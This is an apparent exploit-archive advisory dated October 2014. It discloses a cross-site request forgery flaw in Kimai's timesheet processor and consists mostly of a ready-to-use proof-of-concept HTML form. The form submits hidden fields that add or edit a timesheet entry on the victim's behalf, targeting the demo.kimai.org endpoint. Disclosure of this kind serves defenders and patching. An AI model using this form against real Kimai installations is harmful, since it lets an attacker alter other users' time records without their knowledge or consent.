Home / os / blackberry
Kimai.org Cross Site Request Forgery
Posted on 21 October 2014
# Affected software: http://kimai.org # Type of vulnerability: csrf # URL: http://demo.kimai.org # Discovered by: Provensec # Website: http://www.provensec.com # Description: csrf vulnerability in status edit mechanism due to no csrf token # Proof of concept: <html> <body> <form action=" http://demo.kimai.org/extensions/ki_timesheets/processor.php" method="POST"> <input type="hidden" name="id" value="7" /> <input type="hidden" name="axAction" value="add_edit_timeSheetEntry" /> <input type="hidden" name="projectID" value="2" /> <input type="hidden" name="filter" value="" /> <input type="hidden" name="activityID" value="1" /> <input type="hidden" name="filter" value="" /> <input type="hidden" name="description" value="ZxcZlololololololololoxcfrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr" /> <input type="hidden" name="start_day" value="14.10.2014" /> <input type="hidden" name="end_day" value="15.10.2014" /> <input type="hidden" name="start_time" value="14:44:07" /> <input type="hidden" name="end_time" value="02:44:07" /> <input type="hidden" name="duration" value="12:00:00" /> <input type="hidden" name="location" value="" /> <input type="hidden" name="trackingNumber" value="" /> <input type="hidden" name="comment" value="" /> <input type="hidden" name="commentType" value="0" /> <input type="hidden" name="userID" value="340622533" /> <input type="hidden" name="budget" value="0.00" /> <input type="hidden" name="approved" value="0.00" /> <input type="hidden" name="statusID" value="1" /> <input type="hidden" name="billable" value="0" /> <input type="hidden" name="rate" value="0.00" /> <input type="hidden" name="fixedRate" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
